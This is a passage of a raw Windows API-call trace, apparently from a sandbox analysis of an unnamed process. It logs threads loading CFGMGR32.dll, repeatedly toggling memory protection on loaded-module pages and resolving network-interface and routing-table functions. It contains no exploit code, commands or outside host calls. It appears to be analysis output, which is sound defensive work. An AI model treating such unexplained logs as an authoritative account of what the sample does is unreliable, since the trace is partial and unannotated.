NumberOfBytesToProtect=0x5b2f9e0, NewAccessProtection=0x20, OldAccessProtection=0x5b2fa14 | out: BaseAddress=0x5b2f9dc*=0x77c11000, NumberOfBytesToProtect=0x5b2f9e0, OldAccessProtection=0x5b2fa14*=0x4) returned 0x0 [0112.817] SetLastError (dwErrCode=0x0) [0112.818] GetProcAddress (hModule=0x77c10000, lpProcName="NsiAllocateAndGetTable") returned 0x77c11949 [0112.818] GetCurrentThreadId () returned 0x640 [0112.818] ResetEvent (hEvent=0xb8) returned 1 [0112.818] GetCurrentThreadId () returned 0x640 [0112.818] GetCurrentThreadId () returned 0x640 [0112.818] GetCurrentThreadId () returned 0x640 [0112.818] ResetEvent (hEvent=0xb8) returned 1 [0112.818] GetCurrentThreadId () returned 0x640 [0112.818] GetCurrentThreadId () returned 0x640 [0112.818] SetEvent (hEvent=0xbc) returned 1 [0112.818] SetEvent (hEvent=0xb8) returned 1 [0112.818] CloseHandle (hObject=0x40c) returned 1 [0112.818] GetCurrentThreadId () returned 0x640 [0112.819] ResetEvent (hEvent=0xb8) returned 1 [0112.819] GetCurrentThreadId () returned 0x640 [0112.819] GetCurrentThreadId () returned 0x640 [0112.819] GetCurrentThreadId () returned 0x640 [0112.819] GetCurrentThreadId () returned 0x640 [0112.819] ResetEvent (hEvent=0xb8) returned 1 [0112.819] GetCurrentThreadId () returned 0x640 [0112.819] GetCurrentThreadId () returned 0x640 [0112.819] SetEvent (hEvent=0xbc) returned 1 [0112.819] SetEvent (hEvent=0xb8) returned 1 [0112.819] CloseHandle (hObject=0x40c) returned 1 [0112.819] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=12, lpWideCharStr=0x5b2e5cc, cchWideChar=2047 | out: lpWideCharStr="CFGMGR32.dll") returned 12 [0112.819] SysReAllocStringLen (in: pbstr=0x5b2f5d0*=0x0, psz="CFGMGR32.dll", len=0xc | out: pbstr=0x5b2f5d0*="CFGMGR32.dll") returned 1 [0112.819] CharLowerBuffW (in: lpsz="CFGMGR32.dll", cchLength=0xc | out: lpsz="cfgmgr32.dll") returned 0xc [0112.819] LoadLibraryExA (lpLibFileName="CFGMGR32.dll", hFile=0x0, dwFlags=0x0) returned 0x76be0000 [0113.097] GetLastError () returned 0x0 [0113.097] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0113.097] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0113.097] GetModuleFileNameA (in: hModule=0x76be0000, lpFilename=0x5b2f4b8, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\CFGMGR32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0113.097] GetCurrentProcess () returned 0xffffffff [0113.097] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1128, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.098] GetCurrentProcess () returned 0xffffffff [0113.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1128, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.098] GetCurrentProcess () returned 0xffffffff [0113.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1138, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.098] GetCurrentProcess () returned 0xffffffff [0113.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1138, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.098] GetCurrentProcess () returned 0xffffffff [0113.098] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be117c, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.099] GetCurrentProcess () returned 0xffffffff [0113.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be117c, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.099] GetCurrentProcess () returned 0xffffffff [0113.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1180, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.099] GetCurrentProcess () returned 0xffffffff [0113.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1180, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.099] GetCurrentProcess () returned 0xffffffff [0113.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1188, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.100] GetCurrentProcess () returned 0xffffffff [0113.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1188, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.100] GetCurrentProcess () returned 0xffffffff [0113.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11a4, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.100] GetCurrentProcess () returned 0xffffffff [0113.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11a4, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.100] GetCurrentProcess () returned 0xffffffff [0113.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11d4, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.100] GetCurrentProcess () returned 0xffffffff [0113.100] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11d4, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.101] GetCurrentProcess () returned 0xffffffff [0113.101] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11f8, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.101] GetCurrentProcess () returned 0xffffffff [0113.101] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11f8, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.101] GetCurrentProcess () returned 0xffffffff [0113.101] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11fc, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.101] GetCurrentProcess () returned 0xffffffff [0113.101] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be11fc, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.102] GetCurrentProcess () returned 0xffffffff [0113.102] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1200, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x4, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x20) returned 0x0 [0113.102] GetCurrentProcess () returned 0xffffffff [0113.102] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f5bc*=0x76be1200, NumberOfBytesToProtect=0x5b2f5c0, NewAccessProtection=0x20, OldAccessProtection=0x5b2f5f4 | out: BaseAddress=0x5b2f5bc*=0x76be1000, NumberOfBytesToProtect=0x5b2f5c0, OldAccessProtection=0x5b2f5f4*=0x4) returned 0x0 [0113.102] SetLastError (dwErrCode=0x0) [0113.103] GetProcAddress (hModule=0x76be0000, lpProcName="CM_Open_Class_Key_ExW") returned 0x76be833b [0113.103] GetProcAddress (hModule=0x74590000, lpProcName="ConvertInterfaceGuidToLuid") returned 0x74593f64 [0113.103] GetCurrentThreadId () returned 0x640 [0113.103] ResetEvent (hEvent=0xb8) returned 1 [0113.103] GetCurrentThreadId () returned 0x640 [0113.103] GetCurrentThreadId () returned 0x640 [0113.103] GetCurrentThreadId () returned 0x640 [0113.103] GetCurrentThreadId () returned 0x640 [0113.103] ResetEvent (hEvent=0xb8) returned 1 [0113.103] GetCurrentThreadId () returned 0x640 [0113.103] GetCurrentThreadId () returned 0x640 [0113.104] SetEvent (hEvent=0xbc) returned 1 [0113.104] SetEvent (hEvent=0xb8) returned 1 [0113.104] CloseHandle (hObject=0x40c) returned 1 [0113.104] GetCurrentThreadId () returned 0x640 [0113.104] ResetEvent (hEvent=0xb8) returned 1 [0113.104] GetCurrentThreadId () returned 0x640 [0113.104] GetCurrentThreadId () returned 0x640 [0113.104] GetCurrentThreadId () returned 0x640 [0113.104] GetCurrentThreadId () returned 0x640 [0113.104] ResetEvent (hEvent=0xb8) returned 1 [0113.104] GetCurrentThreadId () returned 0x640 [0113.104] GetCurrentThreadId () returned 0x640 [0113.104] SetEvent (hEvent=0xbc) returned 1 [0113.104] SetEvent (hEvent=0xb8) returned 1 [0113.104] CloseHandle (hObject=0x40c) returned 1 [0113.104] GetProcAddress (hModule=0x74590000, lpProcName="GetIfEntry2") returned 0x745949ab [0113.105] GetCurrentThreadId () returned 0x640 [0113.105] ResetEvent (hEvent=0xb8) returned 1 [0113.105] GetCurrentThreadId () returned 0x640 [0113.105] GetCurrentThreadId () returned 0x640 [0113.105] GetCurrentThreadId () returned 0x640 [0113.105] GetCurrentThreadId () returned 0x640 [0113.105] ResetEvent (hEvent=0xb8) returned 1 [0113.105] GetCurrentThreadId () returned 0x640 [0113.105] GetCurrentThreadId () returned 0x640 [0113.105] SetEvent (hEvent=0xbc) returned 1 [0113.105] SetEvent (hEvent=0xb8) returned 1 [0113.105] CloseHandle (hObject=0x40c) returned 1 [0113.108] GetCurrentThreadId () returned 0x640 [0113.108] ResetEvent (hEvent=0xb8) returned 1 [0113.108] GetCurrentThreadId () returned 0x640 [0113.108] GetCurrentThreadId () returned 0x640 [0113.108] GetCurrentThreadId () returned 0x640 [0113.108] GetCurrentThreadId () returned 0x640 [0113.108] ResetEvent (hEvent=0xb8) returned 1 [0113.108] GetCurrentThreadId () returned 0x640 [0113.108] GetCurrentThreadId () returned 0x640 [0113.108] SetEvent (hEvent=0xbc) returned 1 [0113.108] SetEvent (hEvent=0xb8) returned 1 [0113.108] CloseHandle (hObject=0x40c) returned 1 [0113.109] GetProcAddress (hModule=0x74590000, lpProcName="GetIpForwardTable2") returned 0x74594d3e [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] ResetEvent (hEvent=0xb8) returned 1 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] ResetEvent (hEvent=0xb8) returned 1 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] SetEvent (hEvent=0xbc) returned 1 [0113.109] SetEvent (hEvent=0xb8) returned 1 [0113.109] CloseHandle (hObject=0x40c) returned 1 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] ResetEvent (hEvent=0xb8) returned 1 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] GetCurrentThreadId () returned 0x640 [0113.109] ResetEvent (hEvent=0xb8) returned 1 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] SetEvent (hEvent=0xbc) returned 1 [0113.110] SetEvent (hEvent=0xb8) returned 1 [0113.110] CloseHandle (hObject=0x40c) returned 1 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] ResetEvent (hEvent=0xb8) returned 1 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] ResetEvent (hEvent=0xb8) returned 1 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] SetEvent (hEvent=0xbc) returned 1 [0113.110] SetEvent (hEvent=0xb8) returned 1 [0113.110] CloseHandle (hObject=0x40c) returned 1 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] ResetEvent (hEvent=0xb8) returned 1 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] ResetEvent (hEvent=0xb8) returned 1 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] GetCurrentThreadId () returned 0x640 [0113.110] SetEvent (hEvent=0xbc) returned 1 [0113.110] SetEvent (hEvent=0xb8) returned 1 [0113.111] CloseHandle (hObject=0x40c) returned 1 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] ResetEvent (hEvent=0xb8) returned 1 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] ResetEvent (hEvent=0xb8) returned 1 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] SetEvent (hEvent=0xbc) returned 1 [0113.111] SetEvent (hEvent=0xb8) returned 1 [0113.111] CloseHandle (hObject=0x40c) returned 1 [0113.111] GetProcAddress (hModule=0x74590000, lpProcName="GetIpNetEntry2") returned 0x74594df8 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] ResetEvent (hEvent=0xb8) returned 1 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] GetCurrentThreadId () returned 0x640 [0113.111] ResetEvent (hEvent=0xb8) returned 1 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] SetEvent (hEvent=0xbc) returned 1 [0113.112] SetEvent (hEvent=0xb8) returned 1 [0113.112] CloseHandle (hObject=0x40c) returned 1 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] ResetEvent (hEvent=0xb8) returned 1 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] ResetEvent (hEvent=0xb8) returned 1 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] SetEvent (hEvent=0xbc) returned 1 [0113.112] SetEvent (hEvent=0xb8) returned 1 [0113.112] CloseHandle (hObject=0x40c) returned 1 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] ResetEvent (hEvent=0xb8) returned 1 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] GetCurrentThreadId () returned 0x640 [0113.112] ResetEvent (hEvent=0xb8) returned 1 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] SetEvent (hEvent=0xbc) returned 1 [0113.113] SetEvent (hEvent=0xb8) returned 1 [0113.113] CloseHandle (hObject=0x40c) returned 1 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] ResetEvent (hEvent=0xb8) returned 1 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] ResetEvent (hEvent=0xb8) returned 1 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] GetCurrentThreadId () returned 0x640 [0113.113] SetEvent (hEvent=0xbc) returned 1 [0113.113] SetEvent (hEvent=0xb8) returned 1 [0113.113] CloseHandle (hObject=0x40c) returned 1 [0113.113] GetProcAddress (hModule=0x74590000, lpProcName="FreeMibTable") returned 0x74593d1b [0113.114] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0113.114] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0113.114] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0113.114] GetProcAddress (hModule=0x77c10000, lpProcName="NsiFreeTable") returned 0x77c118f4 [0113.115] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 Thread: id = 9 os_tid = 0x490 [0081.529] SysReAllocStringLen (in: pbstr=0x5c9f934*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5c9f934*="KERNEL32.DLL") returned 1 [0081.529] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0081.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.531] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0081.532] SysReAllocStringLen (in: pbstr=0x5c9f934*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5c9f934*="KERNEL32.DLL") returned 1 [0081.532] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0081.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.534] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0081.534] SysReAllocStringLen (in: pbstr=0x5c9f910*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5c9f910*="KERNEL32.DLL") returned 1 [0081.534] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0081.535] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.537] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0081.539] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 10 os_tid = 0x6dc [0083.700] SysReAllocStringLen (in: pbstr=0x624fa2c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x624fa2c*="KERNEL32.DLL") returned 1 [0083.700] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0083.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0083.708] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0083.708] SysReAllocStringLen (in: pbstr=0x624fa2c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x624fa2c*="KERNEL32.DLL") returned 1 [0083.708] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0083.709] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0083.711] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0083.712] SysReAllocStringLen (in: pbstr=0x624fa08*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x624fa08*="KERNEL32.DLL") returned 1 [0083.712] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0083.712] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0083.715] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0083.718] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0084.014] SysReAllocStringLen (in: pbstr=0x624fce0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x624fce0*="KERNEL32.DLL") returned 1 [0084.014] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0084.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0084.018] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 51 os_tid = 0xc4 [0093.109] SysReAllocStringLen (in: pbstr=0x636f51c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x636f51c*="KERNEL32.DLL") returned 1 [0093.109] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0093.109] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.111] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0093.112] SysReAllocStringLen (in: pbstr=0x636f51c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x636f51c*="KERNEL32.DLL") returned 1 [0093.112] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0093.112] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.114] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0093.114] SysReAllocStringLen (in: pbstr=0x636f4f8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x636f4f8*="KERNEL32.DLL") returned 1 [0093.114] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0093.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.117] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0093.120] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0093.124] SysReAllocStringLen (in: pbstr=0x636f7d0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x636f7d0*="KERNEL32.DLL") returned 1 [0093.124] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0093.124] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.127] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 52 os_tid = 0x8b4 [0111.792] SysReAllocStringLen (in: pbstr=0x647f684*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x647f684*="KERNEL32.DLL") returned 1 [0111.792] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.792] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.795] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.795] SysReAllocStringLen (in: pbstr=0x647f684*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x647f684*="KERNEL32.DLL") returned 1 [0111.795] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.798] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.798] SysReAllocStringLen (in: pbstr=0x647f660*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x647f660*="KERNEL32.DLL") returned 1 [0111.798] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.799] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.801] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.804] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.805] GetCurrentThreadId () returned 0x8b4 [0111.805] ResetEvent (hEvent=0xb8) returned 1 [0111.805] GetCurrentThreadId () returned 0x8b4 [0111.805] GetCurrentThreadId () returned 0x8b4 [0111.805] GetCurrentThreadId () returned 0x8b4 [0111.805] ResetEvent (hEvent=0xb8) returned 1 [0111.805] GetCurrentThreadId () returned 0x8b4 [0111.805] GetCurrentThreadId () returned 0x8b4 [0111.805] SetEvent (hEvent=0xbc) returned 1 [0111.805] SetEvent (hEvent=0xb8) returned 1 [0111.805] CloseHandle (hObject=0x3bc) returned 1 [0111.806] GetProcAddress (hModule=0x76d10000, lpProcName="NotifyServiceStatusChangeA") returned 0x76d1a11d [0111.839] GetCurrentThreadId () returned 0x8b4 [0111.839] ResetEvent (hEvent=0xb8) returned 1 [0111.839] GetCurrentThreadId () returned 0x8b4 [0111.839] GetCurrentThreadId () returned 0x8b4 [0111.839] GetCurrentThreadId () returned 0x8b4 [0111.839] GetCurrentThreadId () returned 0x8b4 [0111.839] ResetEvent (hEvent=0xb8) returned 1 [0111.839] GetCurrentThreadId () returned 0x8b4 [0111.839] GetCurrentThreadId () returned 0x8b4 [0111.839] SetEvent (hEvent=0xbc) returned 1 [0111.839] SetEvent (hEvent=0xb8) returned 1 [0111.839] CloseHandle (hObject=0x3c4) returned 1 Thread: id = 53 os_tid = 0x8c4 [0113.161] SysReAllocStringLen (in: pbstr=0x669f8dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x669f8dc*="KERNEL32.DLL") returned 1 [0113.161] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0113.161] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.164] GetProcAddress 